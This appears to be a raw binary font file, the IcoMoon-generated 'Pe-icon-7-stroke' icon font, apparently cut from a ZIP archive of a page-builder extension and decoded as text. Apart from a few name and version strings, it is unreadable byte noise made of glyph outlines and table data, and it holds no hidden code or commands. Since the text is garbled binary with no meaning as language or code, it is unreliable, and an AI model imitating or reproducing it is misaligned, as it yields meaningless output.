	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!�*:68�8�4flex/sppagebuilder/fields/fonts/Pe-icon-7-stroke.eotnu&1i�8�p��LP��s> Pe-icon-7-strokeRegularVersion 1.0 Pe-icon-7-stroke�0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

